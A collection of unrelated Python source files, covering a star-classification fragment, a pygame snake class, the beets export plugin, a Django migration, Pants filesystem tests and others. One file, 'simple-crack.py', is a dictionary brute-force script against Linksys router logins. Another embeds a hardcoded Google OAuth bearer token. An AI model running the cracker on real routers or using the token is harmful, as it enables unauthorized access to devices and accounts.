r_skew.append(np.NaN)
r_kurtosis.append(np.NaN)
r_welsh_J.append(np.NaN)
r_welsh_K.append(np.NaN)
# del features
features = pd.DataFrame()
N = 1
# g filter data
features['g_mean'] = g_mean[0:N]
features['g_wmean'] = g_wmean[0:N]
features['g_MAD'] = g_MAD[0:N]
features['g_IQR'] = g_IQR[0:N]
features['g_f60'] = g_f60[0:N]
features['g_f70'] = g_f70[0:N]
features['g_f80'] = g_f80[0:N]
features['g_f90'] = g_f90[0:N]
features['g_skew'] = g_skew[0:N]
features['g_kurtosis'] = g_kurtosis[0:N]
features['g_welsh_J'] = g_welsh_J[0:N]
features['g_welsh_K'] = g_welsh_K[0:N]
# r filter data
features['r_mean'] = r_mean[0:N]
features['r_wmean'] = r_wmean[0:N]
features['r_MAD'] = r_MAD[0:N]
features['r_IQR'] = r_IQR[0:N]
features['r_f60'] = r_f60[0:N]
features['r_f70'] = r_f70[0:N]
features['r_f80'] = r_f80[0:N]
features['r_f90'] = r_f90[0:N]
features['r_skew'] = r_skew[0:N]
features['r_kurtosis'] = r_kurtosis[0:N]
features['r_welsh_J'] = r_welsh_J[0:N]
features['r_welsh_K'] = r_welsh_K[0:N]
return features
def prediction_probabilty(features):
"""
Predict probability for each of the 9 variable types using pre calculated features.
"""
prob={}
label = ['BYDra', 'EW', 'SR', 'RSCVN', 'RR', 'DSCT', 'EA', 'Mira', 'RRc']
prob_pd = pd.DataFrame(columns=['Probability'],index=label)
if np.isnan(features.iloc[0,:].values).all():
pass
else:
for variable_type in label:
print(variable_type)
name = 'XGBoost'
filename = '../pickles/'+ name+'_'+variable_type+'.pkl'
clf = pickle.load(open(filename, 'rb'))
predict_proba = clf.predict_proba(features)
prob[variable_type] = round(predict_proba[0,0],2)
# prob[variable_type] = clf.predict_proba(features)
prob_pd['Probability']=prob.values()
return prob_pd
@st.cache
def true_label(ID):
"""
Find true star type in the labeled data set
"""
## open label data table
widths = (8,7,4,13,43)
header_pd = pd.read_fwf('../databases/Labeled_data.txt', widths = widths,skiprows=7, nrows=27)
labeled_data = pd.read_csv('../databases/Labeled_data.txt', header=None, delim_whitespace=True, skiprows=36) # extract data
labeled_data.columns = header_pd.iloc[:,3]
true_label = labeled_data.loc[labeled_data['SourceID']==ID,'Type']
return true_label.values[0]
|
import pygame
import math
WINDOW_WIDTH = 1280
WINDOW_HEIGHT = 736
class Player:
# Direction: 0 = right, 1 = down, 2 = left, 3 = up
def __init__(self):
self.image = pygame.image.load('./pics/player.png')
self.rect = self.image.get_rect()
self.rect.x = 0
self.rect.y = 0
self.length = 1
self.xPos = [0]
self.yPos = [0]
self.speed = 32
self.direction = 0
def moveLeft(self):
if self.direction != 0:
self.direction = 2
def moveUp(self):
if self.direction != 1:
self.direction = 3
def moveRight(self):
if self.direction != 2:
self.direction = 0
def moveDown(self):
if self.direction != 3:
self.direction = 1
def getPosition(self, type):
if type == "X":
returnValue = self.rect.x
else:
returnValue = self.rect.y
return returnValue
def update(self):
# Movement
if self.direction == 0:
self.rect.x += self.speed
elif self.direction == 1:
self.rect.y += self.speed
elif self.direction == 2:
self.rect.x -= self.speed
else:
self.rect.y -= self.speed
if self.rect.x > WINDOW_WIDTH-32:
self.rect.x = 0
if self.rect.x < 0:
self.rect.x = WINDOW_WIDTH
if self.rect.y > WINDOW_HEIGHT-32:
self.rect.y = 0
if self.rect.y < 0:
self.rect.y = WINDOW_HEIGHT
# Position Logic
if self.length >= 2:
for i in range(self.length-1, 0, -1):
self.xPos[i] = self.xPos[i-1]
self.yPos[i] = self.yPos[i-1]
self.xPos[0] = self.rect.x
self.yPos[0] = self.rect.y
def draw(self, surface):
# Draw Head
surface.blit(
self.image, self.rect)
for i in range(0, self.length-1):
surface.blit(self.image, (self.xPos[i], self.yPos[i]))
def updateLength(self):
self.xPos.append(self.xPos[self.length-1])
self.yPos.append(self.yPos[self.length-1])
self.length += 1
def isCollidingWithApple(self, apple):
isColliding = None
if self.rect.colliderect(apple):
isColliding = True
self.updateLength()
return isColliding
def isCollidingWithMyself(self):
isColliding = None
for i in range(1, self.length-1, 1):
if math.sqrt((self.xPos[i]-self.xPos[0])**2 + (self.yPos[i] - self.yPos[0])**2) < 32:
isColliding = True
return isColliding
|
# This file is part of beets.
#
# Permission is hereby granted, free of charge, to any person obtaining
# a copy of this software and associated documentation files (the
# "Software"), to deal in the Software without restriction, including
# without limitation the rights to use, copy, modify, merge, publish,
# distribute, sublicense, and/or sell copies of the Software, and to
# permit persons to whom the Software is furnished to do so, subject to
# the following conditions:
#
# The above copyright notice and this permission notice shall be
# included in all copies or substantial portions of the Software.
"""Exports data from beets
"""
import sys
import codecs
import json
import csv
from xml.etree import ElementTree
from datetime import datetime, date
from beets.plugins import BeetsPlugin
from beets import ui
from beets import util
import mediafile
from beetsplug.info import library_data, tag_data
class ExportEncoder(json.JSONEncoder):
"""Deals with dates because JSON doesn't have a standard"""
def default(self, o):
if isinstance(o, (datetime, date)):
return o.isoformat()
return json.JSONEncoder.default(self, o)
class ExportPlugin(BeetsPlugin):
def __init__(self):
super().__init__()
self.config.add({
'default_format': 'json',
'json': {
# JSON module formatting options.
'formatting': {
'ensure_ascii': False,
'indent': 4,
'separators': (',', ': '),
'sort_keys': True
}
},
'jsonlines': {
# JSON Lines formatting options.
'formatting': {
'ensure_ascii': False,
'separators': (',', ': '),
'sort_keys': True
}
},
'csv': {
# CSV module formatting options.
'formatting': {
# The delimiter used to separate columns.
'delimiter': ',',
# The dialect to use when formatting the file output.
'dialect': 'excel'
}
},
'xml': {
# XML module formatting options.
'formatting': {}
}
# TODO: Use something like the edit plugin
# 'item_fields': []
})
def commands(self):
cmd = ui.Subcommand('export', help='export data from beets')
cmd.func = self.run
cmd.parser.add_option(
'-l', '--library', action='store_true',
help='show library fields instead of tags',
)
cmd.parser.add_option(
'-a', '--album', action='store_true',
help='show album fields instead of tracks (implies "--library")',
)
cmd.parser.add_option(
'--append', action='store_true', default=False,
help='if should append data to the file',
)
cmd.parser.add_option(
'-i', '--include-keys', default=[],
action='append', dest='included_keys',
help='comma separated list of keys to show',
)
cmd.parser.add_option(
'-o', '--output',
help='path for the output file. If not given, will print the data'
)
cmd.parser.add_option(
'-f', '--format', default='json',
help="the output format: json (default), jsonlines, csv, or xml"
)
return [cmd]
def run(self, lib, opts, args):
file_path = opts.output
file_mode = 'a' if opts.append else 'w'
file_format = opts.format or self.config['default_format'].get(str)
file_format_is_line_based = (file_format == 'jsonlines')
format_options = self.config[file_format]['formatting'].get(dict)
export_format = ExportFormat.factory(
file_type=file_format,
**{
'file_path': file_path,
'file_mode': file_mode
}
)
if opts.library or opts.album:
data_collector = library_data
else:
data_collector = tag_data
included_keys = []
for keys in opts.included_keys:
included_keys.extend(keys.split(','))
items = []
for data_emitter in data_collector(
lib, ui.decargs(args),
album=opts.album,
):
try:
data, item = data_emitter(included_keys or '*')
except (mediafile.UnreadableFileError, OSError) as ex:
self._log.error('cannot read file: {0}', ex)
continue
for key, value in data.items():
if isinstance(value, bytes):
data[key] = util.displayable_path(value)
if file_format_is_line_based:
export_format.export(data, **format_options)
else:
items += [data]
if not file_format_is_line_based:
export_format.export(items, **format_options)
class ExportFormat:
"""The output format type"""
def __init__(self, file_path, file_mode='w', encoding='utf-8'):
self.path = file_path
self.mode = file_mode
self.encoding = encoding
# creates a file object to write/append or sets to stdout
self.out_stream = codecs.open(self.path, self.mode, self.encoding) \
if self.path else sys.stdout
@classmethod
def factory(cls, file_type, **kwargs):
if file_type in ["json", "jsonlines"]:
return JsonFormat(**kwargs)
elif file_type == "csv":
return CSVFormat(**kwargs)
elif file_type == "xml":
return XMLFormat(**kwargs)
else:
raise NotImplementedError()
def export(self, data, **kwargs):
raise NotImplementedError()
class JsonFormat(ExportFormat):
"""Saves in a json file"""
def __init__(self, file_path, file_mode='w', encoding='utf-8'):
super().__init__(file_path, file_mode, encoding)
def export(self, data, **kwargs):
json.dump(data, self.out_stream, cls=ExportEncoder, **kwargs)
self.out_stream.write('\n')
class CSVFormat(ExportFormat):
"""Saves in a csv file"""
def __init__(self, file_path, file_mode='w', encoding='utf-8'):
super().__init__(file_path, file_mode, encoding)
def export(self, data, **kwargs):
header = list(data[0].keys()) if data else []
writer = csv.DictWriter(self.out_stream, fieldnames=header, **kwargs)
writer.writeheader()
writer.writerows(data)
class XMLFormat(ExportFormat):
"""Saves in a xml file"""
def __init__(self, file_path, file_mode='w', encoding='utf-8'):
super().__init__(file_path, file_mode, encoding)
def export(self, data, **kwargs):
# Creates the XML file structure.
library = ElementTree.Element('library')
tracks = ElementTree.SubElement(library, 'tracks')
if data and isinstance(data[0], dict):
for index, item in enumerate(data):
track = ElementTree.SubElement(tracks, 'track')
for key, value in item.items():
track_details = ElementTree.SubElement(track, key)
track_details.text = value
# Depending on the version of python the encoding needs to change
try:
data = ElementTree.tostring(library, encoding='unicode', **kwargs)
except LookupError:
data = ElementTree.tostring(library, encoding='utf-8', **kwargs)
self.out_stream.write(data)
|
# simple-crack.py - simple cracking method for linksys routers using JNAP library
# May 4th 2019
# info@tpidg.us
from jnap.router import Linksys
from time import sleep
import json
import sys
import getpass
addr = sys.argv[1]
dict = sys.argv[2]
router = Linksys(addr)
passwords = [line.rstrip('\n') for line in open(dict)]
count = 0
router.password(passwords[count])
checked_pass = router.check_password(passwords[count]).content
print str(count) + " " + str(passwords[count])
count += 1
while "Invalid" in checked_pass:
router.password(passwords[count])
checked_pass = router.check_password(passwords[count]).content
print str(count) + " " + str(passwords[count])
count += 1
print "Success!!" + str(passwords[count])
|
import unittest
import time
from utils import get_config
from utils import get_driver
class TestBase(unittest.TestCase):
def setUp(self):
self.config = get_config()
self.driver = get_driver()
time.sleep(0.5)
self.driver.maximize_window()
def tearDown(self):
self.driver.quit()
|
class Measures(object):
def __init__(self, measures_list=[]):
self.measures_list = measures_list[:]
def get_measures(self):
"""Return a list of Measure"""
#print dir(self.measures_list)
#print self.measures_list[0] is self.measures_list[3]
#raw_input('pigia2')
return self.measures_list
def add_measure(self, measure):
"""Adds a Measure"""
self.measures_list.append(measure)
|
from distutils.version import StrictVersion
VERSION = StrictVersion('0.3.5')
|
# -*- coding: utf-8 -*-
# Generated by Django 1.11 on 2019-07-26 14:32
from __future__ import unicode_literals
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
('features', '0009_auto_20190724_1025'),
]
operations = [
migrations.RemoveField(
model_name='feature',
name='tag',
),
migrations.AddField(
model_name='feature',
name='devComments',
field=models.TextField(blank=True, null=True),
),
migrations.AddField(
model_name='feature',
name='version',
field=models.CharField(blank=True, max_length=20, null=True),
),
]
|
import requests
#######
#This code works for getting a list of the courses
######
def sendRequest(url, headers):
r = requests.get(url, headers=headers)
return r
def getCourses(authToken):
headers = {}
headers["Authorization"] = authToken
r = sendRequest("https://classroom.googleapis.com/v1/courses", headers=headers)
return r.json()
def getAllCourseWork(authToken, courseID):
headers = {}
headers["Authorization"] = authToken
url = "https://classroom.googleapis.com/v1/courses/{0}/courseWork".format(authToken)
r = sendRequest(url, headers=headers)
return r.json()
authToken = "Bearer ya29.GlsIBJVWjjMiklgyfUWARL4fjXJmsr0OJd_HT0fkZBZIAaUVQZ6UdvWB3NX5Hf20fmeYQvxAr-ddw_GAsyLBpY7ktxIMDq6pQUYqL5R0JYkqf4kllw5n42tI4jrC"
print(getAllCourseWork(authToken, "284461542"))
|
# Copyright 2015 Pants project contributors (see CONTRIBUTORS.md).
# Licensed under the Apache License, Version 2.0 (see LICENSE).
from __future__ import annotations
import hashlib
import os
import pkgutil
import shutil
import socket
import ssl
import tarfile
import time
from dataclasses import dataclass
from http.server import BaseHTTPRequestHandler
from io import BytesIO
from pathlib import Path
from typing import Callable, Dict, Iterable, Optional, Set, Union
import pytest
from pants.engine.console import Console
from pants.engine.fs import (
EMPTY_DIGEST,
EMPTY_SNAPSHOT,
AddPrefix,
CreateDigest,
Digest,
DigestContents,
DigestEntries,
DigestSubset,
Directory,
DownloadFile,
FileContent,
FileDigest,
FileEntry,
GlobMatchErrorBehavior,
MergeDigests,
PathGlobs,
PathGlobsAndRoot,
RemovePrefix,
Snapshot,
SnapshotDiff,
SymlinkEntry,
Workspace,
)
from pants.engine.goal import Goal, GoalSubsystem
from pants.engine.internals.scheduler import ExecutionError
from pants.engine.rules import Get, goal_rule, rule
from pants.testutil.rule_runner import QueryRule, RuleRunner
from pants.util.collections import assert_single_element
from pants.util.contextutil import http_server, temporary_dir
from pants.util.dirutil import relative_symlink, safe_file_dump
@pytest.fixture
def rule_runner() -> RuleRunner:
return RuleRunner(
rules=[
QueryRule(Digest, [CreateDigest]),
QueryRule(DigestContents, [PathGlobs]),
QueryRule(DigestEntries, [Digest]),
QueryRule(DigestEntries, [PathGlobs]),
QueryRule(Snapshot, [CreateDigest]),
QueryRule(Snapshot, [DigestSubset]),
QueryRule(Snapshot, [PathGlobs]),
],
isolated_local_store=True,
)
ROLAND_FILE_DIGEST = FileDigest(
"693d8db7b05e99c6b7a7c0616456039d89c555029026936248085193559a0b5d", 16
)
ROLAND_DIGEST = Digest("63949aa823baf765eff07b946050d76ec0033144c785a94d3ebd82baa931cd16", 80)
def prime_store_with_roland_digest(rule_runner: RuleRunner) -> None:
"""Prime lmdb_store with a directory of a file named 'roland' and contents 'European
Burmese'."""
with temporary_dir() as temp_dir:
Path(temp_dir, "roland").write_text("European Burmese")
snapshot = rule_runner.scheduler.capture_snapshots(
(PathGlobsAndRoot(PathGlobs(["*"]), temp_dir),)
)[0]
assert snapshot.files == ("roland",)
assert snapshot.digest == ROLAND_DIGEST
# NB: Capturing a Snapshot avoids persisting directory entries to disk, so we have to ensure
# that independently.
rule_runner.scheduler.ensure_directory_digest_persisted(snapshot.digest)
def setup_fs_test_tar(rule_runner: RuleRunner) -> None:
"""Extract fs_test.tar into the rule_runner's build root.
Note that we use a tar, rather than rule_runner.write_files(), because it has symlinks set up a
certain way.
Contents:
4.txt
a
├── 3.txt
├── 4.txt.ln -> ../4.txt
└── b
├── 1.txt
└── 2
c.ln -> a/b
d.ln -> a
"""
data = pkgutil.get_data("pants.engine.internals", "fs_test_data/fs_test.tar")
assert data is not None
io = BytesIO()
io.write(data)
io.seek(0)
with tarfile.open(fileobj=io) as tf:
tf.extractall(rule_runner.build_root)
FS_TAR_ALL_FILES = (
"4.txt",
"a/3.txt",
"a/4.txt.ln",
"a/b/1.txt",
"a/b/2",
"c.ln/1.txt",
"c.ln/2",
"d.ln/3.txt",
"d.ln/4.txt.ln",
"d.ln/b/1.txt",
"d.ln/b/2",
)
FS_TAR_ALL_DIRS = ("a", "a/b", "c.ln", "d.ln", "d.ln/b")
def try_with_backoff(assertion_fn: Callable[[], bool], count: int = 4) -> bool:
for i in range(count):
time.sleep(0.1 * i)
if assertion_fn():
return True
return False
# -----------------------------------------------------------------------------------------------
# `PathGlobs`, including `GlobMatchErrorBehavior` and symlink handling
# -----------------------------------------------------------------------------------------------
def assert_path_globs(
rule_runner: RuleRunner,
globs: Iterable[str],
*,
expected_files: Iterable[str],
expected_dirs: Iterable[str],
) -> None:
snapshot = rule_runner.request(Snapshot, [PathGlobs(globs)])
assert snapshot.files == tuple(sorted(expected_files))
assert snapshot.dirs == tuple(sorted(expected_dirs))
if expected_files or expected_dirs:
assert snapshot.digest != EMPTY_DIGEST
else:
assert snapshot.digest == EMPTY_DIGEST
def test_path_globs_literal_files(rule_runner: RuleRunner) -> None:
setup_fs_test_tar(rule_runner)
assert_path_globs(rule_runner, ["4.txt"], expected_files=["4.txt"], expected_dirs=[])
assert_path_globs(
rule_runner,
["a/b/1.txt", "a/b/2"],
expected_files=["a/b/1.txt", "a/b/2"],
expected_dirs=["a", "a/b"],
)
assert_path_globs(rule_runner, ["c.ln/2"], expected_files=["c.ln/2"], expected_dirs=["c.ln"])
assert_path_globs(
rule_runner,
["d.ln/b/1.txt"],
expected_files=["d.ln/b/1.txt"],
expected_dirs=["d.ln", "d.ln/b"],
)
assert_path_globs(rule_runner, ["a/3.txt"], expected_files=["a/3.txt"], expected_dirs=["a"])
assert_path_globs(rule_runner, ["z.fake"], expected_files=[], expected_dirs=[])
def test_path_globs_literal_directories(rule_runner: RuleRunner) -> None:
setup_fs_test_tar(rule_runner)
assert_path_globs(rule_runner, ["c.ln"], expected_files=[], expected_dirs=["c.ln"])
assert_path_globs(rule_runner, ["a"], expected_files=[], expected_dirs=["a"])
assert_path_globs(rule_runner, ["a/b"], expected_files=[], expected_dirs=["a", "a/b"])
assert_path_globs(rule_runner, ["z"], expected_files=[], expected_dirs=[])
def test_path_globs_glob_pattern(rule_runner: RuleRunner) -> None:
setup_fs_test_tar(rule_runner)
assert_path_globs(rule_runner, ["*.txt"], expected_files=["4.txt"], expected_dirs=[])
assert_path_globs(
rule_runner, ["a/b/*.txt"], expected_files=["a/b/1.txt"], expected_dirs=["a", "a/b"]
)
assert_path_globs(
rule_runner, ["c.ln/*.txt"], expected_files=["c.ln/1.txt"], expected_dirs=["c.ln"]
)
assert_path_globs(
rule_runner, ["a/b/*"], expected_files=["a/b/1.txt", "a/b/2"], expected_dirs=["a", "a/b"]
)
assert_path_globs(rule_runner, ["*/0.txt"], expected_files=[], expected_dirs=[])
assert_path_globs(
rule_runner, ["*"], expected_files=["4.txt"], expected_dirs=["a", "c.ln", "d.ln"]
)
assert_path_globs(
rule_runner,
["*/*"],
expected_files=[
"a/3.txt",
"a/4.txt.ln",
"c.ln/1.txt",
"c.ln/2",
"d.ln/3.txt",
"d.ln/4.txt.ln",
],
expected_dirs=FS_TAR_ALL_DIRS,
)
assert_path_globs(
rule_runner,
["*/*/*"],
expected_files=["a/b/1.txt", "a/b/2", "d.ln/b/1.txt", "d.ln/b/2"],
expected_dirs=["a", "a/b", "d.ln", "d.ln/b"],
)
def test_path_globs_rglob_pattern(rule_runner: RuleRunner) -> None:
setup_fs_test_tar(rule_runner)
assert_path_globs(
rule_runner,
["**/*.txt.ln"],
expected_files=["a/4.txt.ln", "d.ln/4.txt.ln"],
expected_dirs=["a", "d.ln"],
)
assert_path_globs(
rule_runner,
["**/*.txt"],
expected_files=[
"4.txt",
"a/3.txt",
"a/b/1.txt",
"c.ln/1.txt",
"d.ln/3.txt",
"d.ln/b/1.txt",
],
expected_dirs=FS_TAR_ALL_DIRS,
)
assert_path_globs(
rule_runner,
["**/3.t*t"],
expected_files=["a/3.txt", "d.ln/3.txt"],
expected_dirs=["a", "d.ln"],
)
assert_path_globs(rule_runner, ["**/*.fake"], expected_files=[], expected_dirs=[])
assert_path_globs(
rule_runner, ["**"], expected_files=FS_TAR_ALL_FILES, expected_dirs=FS_TAR_ALL_DIRS
)
assert_path_globs(
rule_runner, ["**/*"], expected_files=FS_TAR_ALL_FILES, expected_dirs=FS_TAR_ALL_DIRS
)
assert_path_globs(
rule_runner,
["a/**"],
expected_files=["a/3.txt", "a/4.txt.ln", "a/b/1.txt", "a/b/2"],
expected_dirs=["a", "a/b"],
)
assert_path_globs(
rule_runner,
["d.ln/**"],
expected_files=["d.ln/3.txt", "d.ln/4.txt.ln", "d.ln/b/1.txt", "d.ln/b/2"],
expected_dirs=["d.ln", "d.ln/b"],
)
assert_path_globs(rule_runner, ["a/**/3.txt"], expected_files=["a/3.txt"], expected_dirs=["a"])
assert_path_globs(
rule_runner, ["a/**/b/1.txt"], expected_files=["a/b/1.txt"], expected_dirs=["a", "a/b"]
)
assert_path_globs(rule_runner, ["a/**/2"], expected_files=["a/b/2"], expected_dirs=["a", "a/b"])
def test_path_globs_ignore_pattern(rule_runner: RuleRunner) -> None:
setup_fs_test_tar(rule_runner)
assert_path_globs(
rule_runner,
["**", "!*.ln"],
expected_files=["4.txt", "a/3.txt", "a/b/1.txt", "a/b/2"],
expected_dirs=["a", "a/b"],
)
def test_path_globs_ignore_sock(rule_runner: RuleRunner) -> None:
sock_path = os.path.join(rule_runner.build_root, "sock.sock")
with socket.socket(socket.AF_UNIX) as sock:
sock.bind(sock_path)
assert os.path.exists(sock_path)
assert not os.path.isfile(sock_path)
rule_runner.write_files({"non-sock.txt": ""})
assert_path_globs(
rule_runner,
["**"],
expected_files=["non-sock.txt"],
expected_dirs=[],
)
def test_path_globs_remove_duplicates(rule_runner: RuleRunner) -> None:
setup_fs_test_tar(rule_runner)
assert_path_globs(
rule_runner, ["*", "**"], expected_files=FS_TAR_ALL_FILES, expected_dirs=FS_TAR_ALL_DIRS
)
assert_path_globs(
rule_runner,
["**/*.txt", "a/b/1.txt", "4.txt"],
expected_files=[
"4.txt",
"a/3.txt",
"c.ln/1.txt",
"d.ln/3.txt",
"a/b/1.txt",
"d.ln/b/1.txt",
],
expected_dirs=FS_TAR_ALL_DIRS,
)
def test_path_globs_parent_link(rule_runner: RuleRunner) -> None:
setup_fs_test_tar(rule_runner)
assert_path_globs(
rule_runner,
["c.ln/../3.txt"],
expected_files=["c.ln/../3.txt"],
expected_dirs=["c.ln", "c.ln/.."],
)
def test_path_globs_symlink_escaping_errors(rule_runner: RuleRunner) -> None:
setup_fs_test_tar(rule_runner)
link = os.path.join(rule_runner.build_root, "subdir/escaping")
dest = os.path.join(rule_runner.build_root, "../../..")
relative_symlink(dest, link)
exc_reg = r".*While expanding link.*subdir/escaping.*may not traverse outside of the buildroot"
with pytest.raises(Exception, match=exc_reg):
assert_path_globs(rule_runner, ["subdir/escaping"], expected_files=[], expected_dirs=[])
def test_path_globs_symlink_dead(rule_runner: RuleRunner) -> None:
setup_fs_test_tar(rule_runner)
link = os.path.join(rule_runner.build_root, "subdir/dead")
dest = os.path.join(rule_runner.build_root, "this_file_does_not_exist")
relative_symlink(dest, link)
# Because the symlink does not escape, it should be ignored, rather than cause an error.
assert_path_globs(rule_runner, ["subdir/dead"], expected_files=[], expected_dirs=[])
def test_path_globs_symlink_dead_nested(rule_runner: RuleRunner) -> None:
setup_fs_test_tar(rule_runner)
link = os.path.join(rule_runner.build_root, "subdir/dead")
dest = os.path.join(
rule_runner.build_root, "this_folder_does_not_exist/this_file_does_not_exist"
)
relative_symlink(dest, link)
# Because the symlink does not escape, it should be ignored, rather than cause an error.
assert_path_globs(rule_runner, ["subdir/dead"], expected_files=[], expected_dirs=[])
def test_path_globs_symlink_loop(rule_runner: RuleRunner) -> None:
# Matching a recursive glob against a link which points to its parent directory would cause
# infinite recursion, so we eagerly error instead.
setup_fs_test_tar(rule_runner)
link = os.path.join(rule_runner.build_root, "subdir/link.ln")
dest = os.path.join(rule_runner.build_root, "subdir")
relative_symlink(dest, link)
exc_reg = r".*Maximum link depth exceeded"
with pytest.raises(Exception, match=exc_reg):
assert_path_globs(rule_runner, ["**"], expected_files=[], expected_dirs=[])
def test_path_globs_to_digest_contents(rule_runner: RuleRunner) -> None:
setup_fs_test_tar(rule_runner)
def get_contents(globs: Iterable[str]) -> Set[FileContent]:
return set(rule_runner.request(DigestContents, [PathGlobs(globs)]))
assert get_contents(["4.txt", "a/4.txt.ln"]) == {
FileContent("4.txt", b"four\n"),
FileContent("a/4.txt.ln", b"four\n"),
}
assert get_contents(["c.ln/../3.txt"]) == {FileContent("c.ln/../3.txt", b"three\n")}
# Directories are empty.
assert not get_contents(["a/b"])
assert not get_contents(["c.ln"])
def test_path_globs_to_digest_entries(rule_runner: RuleRunner) -> None:
setup_fs_test_tar(rule_runner)
def get_entries(globs: Iterable[str]) -> Set[Union[FileEntry, Directory, SymlinkEntry]]:
return set(rule_runner.request(DigestEntries, [PathGlobs(globs)]))
assert get_entries(["4.txt", "a/4.txt.ln"]) == {
FileEntry(
"4.txt",
FileDigest("ab929fcd5594037960792ea0b98caf5fdaf6b60645e4ef248c28db74260f393e", 5),
),
FileEntry(
"a/4.txt.ln",
FileDigest("ab929fcd5594037960792ea0b98caf5fdaf6b60645e4ef248c28db74260f393e", 5),
),
}
assert get_entries(["c.ln/../3.txt"]) == {
FileEntry(
"c.ln/../3.txt",
FileDigest("f6936912184481f5edd4c304ce27c5a1a827804fc7f329f43d273b8621870776", 6),
)
}
# Directories are empty.
assert get_entries(["a/b"]) == {Directory("a/b")}
assert get_entries(["c.ln"]) == {Directory("c.ln")}
def test_digest_entries_handles_empty_directory(rule_runner: RuleRunner) -> None:
digest = rule_runner.request(
Digest, [CreateDigest([Directory("a/b"), FileContent("a/foo.txt", b"four\n")])]
)
entries = rule_runner.request(DigestEntries, [digest])
assert entries == DigestEntries(
[
Directory("a/b"),
FileEntry(
"a/foo.txt",
FileDigest("ab929fcd5594037960792ea0b98caf5fdaf6b60645e4ef248c28db74260f393e", 5),
),
]
)
def test_digest_entries_handles_symlinks(rule_runner: RuleRunner) -> None:
digest = rule_runner.request(
Digest,
[
CreateDigest(
[
SymlinkEntry("a.ln", "a.txt"),
SymlinkEntry("b.ln", "b.txt"),
FileContent("a.txt", b"four\n"),
]
)
],
)
entries = rule_runner.request(DigestEntries, [digest])
assert entries == DigestEntries(
[
SymlinkEntry("a.ln", "a.txt"),
FileEntry(
"a.txt",
FileDigest("ab929fcd5594037960792ea0b98caf5fdaf6b60645e4ef248c28db74260f393e", 5),
),
SymlinkEntry("b.ln", "b.txt"),
]
)
@pytest.mark.parametrize(
"create_digest, files, dirs",
[
pytest.param(
CreateDigest(
[
FileContent("file.txt", b"four\n"),
SymlinkEntry("symlink", "file.txt"),
SymlinkEntry("relsymlink", "./file.txt"),
SymlinkEntry("a/symlink", "../file.txt"),
SymlinkEntry("a/b/symlink", "../../file.txt"),
]
),
("a/b/symlink", "a/symlink", "file.txt", "relsymlink", "symlink"),
("a", "a/b"),
id="simple",
),
pytest.param(
CreateDigest(
[
FileContent("file.txt", b"four\n"),
SymlinkEntry(
"circular1", "./circular1"
), # After so many traversals, we give up
SymlinkEntry("circular2", "circular2"), # After so many traversals, we give up
SymlinkEntry("chain1", "chain2"),
SymlinkEntry("chain2", "chain3"),
SymlinkEntry("chain3", "chain1"),
SymlinkEntry(
"a/symlink", "file.txt"
), # looks for a/file.txt, which doesn't exist
SymlinkEntry("a/too-far.ln", "../../file.txt"), # went too far up
SymlinkEntry("a/parent", ".."),
SymlinkEntry("too-far.ln", "../file.txt"), # went too far up
SymlinkEntry("absolute1.ln", str(Path(__file__).resolve())), # absolute path
SymlinkEntry("absolute2.ln", "/file.txt"),
]
),
("file.txt",),
("a",),
id="ignored",
),
pytest.param(
CreateDigest(
[
FileContent("file.txt", b"four\n"),
SymlinkEntry("a/b/parent-file.ln", "../../file.txt"),
SymlinkEntry("dirlink", "a"),
]
),
("a/b/parent-file.ln", "dirlink/b/parent-file.ln", "file.txt"),
("a", "a/b", "dirlink", "dirlink/b"),
id="parentdir-in-symlink-target",
),
pytest.param(
CreateDigest(
[
FileContent("a/file.txt", b"four\n"),
SymlinkEntry("dirlink", "a"),
SymlinkEntry("double-dirlink", "dirlink"),
]
),
("a/file.txt", "dirlink/file.txt", "double-dirlink/file.txt"),
("a", "dirlink", "double-dirlink"),
id="double-dirlink",
),
pytest.param(
CreateDigest(
[
FileContent("a/file.txt", b"four\n"),
SymlinkEntry("a/self", "."),
]
),
tuple(f"a/{'self/' * count}file.txt" for count in range(64)),
("a",),
id="self-dir",
),
],
)
def test_snapshot_and_contents_are_symlink_oblivious(
rule_runner: RuleRunner,
create_digest: CreateDigest,
files: tuple[str, ...],
dirs: tuple[str, ...],
) -> None:
digest = rule_runner.request(Digest, [create_digest])
snapshot = rule_runner.request(Snapshot, [digest])
assert snapshot.files == files
assert snapshot.dirs == dirs
contents = rule_runner.request(DigestContents, [digest])
assert tuple(content.path for content in contents) == files
def test_glob_match_error_behavior(rule_runner: RuleRunner, caplog) -> None:
setup_fs_test_tar(rule_runner)
test_name = f"{__name__}.{test_glob_match_error_behavior.__name__}()"
def evaluate_path_globs(globs: Iterable[str], error_behavior: GlobMatchErrorBehavior) -> None:
pg = PathGlobs(
globs,
glob_match_error_behavior=error_behavior,
description_of_origin=(
test_name if error_behavior != GlobMatchErrorBehavior.ignore else None
),
)
rule_runner.request(Snapshot, [pg])
with pytest.raises(Exception) as exc:
evaluate_path_globs(["not-a-file.txt"], GlobMatchErrorBehavior.error)
assert f'Unmatched glob from {test_name}: "not-a-file.txt"' in str(exc.value)
with pytest.raises(Exception) as exc:
evaluate_path_globs(["not-a-file.txt", "!ignore.txt"], GlobMatchErrorBehavior.error)
assert f'Unmatched glob from {test_name}: "not-a-file.txt", exclude: "ignore.txt"' in str(
exc.value
)
# TODO: get Rust logging working with RuleRunner.
# caplog.clear()
# evaluate_path_globs(["not-a-file.txt"], GlobMatchErrorBehavior.warn)
# assert len(caplog.records) == 1
# assert f'Unmatched glob from {test_name}: "not-a-file.txt"' in caplog.text
caplog.clear()
evaluate_path_globs(["not-a-file.txt"], GlobMatchErrorBehavior.ignore)
assert len(caplog.records) == 0
# -----------------------------------------------------------------------------------------------
# `PathGlobsAndRoot`
# -----------------------------------------------------------------------------------------------
def test_snapshot_from_outside_buildroot(rule_runner: RuleRunner) -> None:
with temporary_dir() as temp_dir:
Path(temp_dir, "roland").write_text("European Burmese")
snapshot = rule_runner.scheduler.capture_snapshots(
[PathGlobsAndRoot(PathGlobs(["*"]), temp_dir)]
)[0]
assert snapshot.files == ("roland",)
assert snapshot.digest == ROLAND_DIGEST
def test_multiple_snapshots_from_outside_buildroot(rule_runner: RuleRunner) -> None:
with temporary_dir() as temp_dir:
Path(temp_dir, "roland").write_text("European Burmese")
Path(temp_dir, "susannah").write_text("I don't know")
snapshots = rule_runner.scheduler.capture_snapshots(
[
PathGlobsAndRoot(PathGlobs(["roland"]), temp_dir),
PathGlobsAndRoot(PathGlobs(["susannah"]), temp_dir),
PathGlobsAndRoot(PathGlobs(["doesnotexist"]), temp_dir),
]
)
assert len(snapshots) == 3
assert snapshots[0].files == ("roland",)
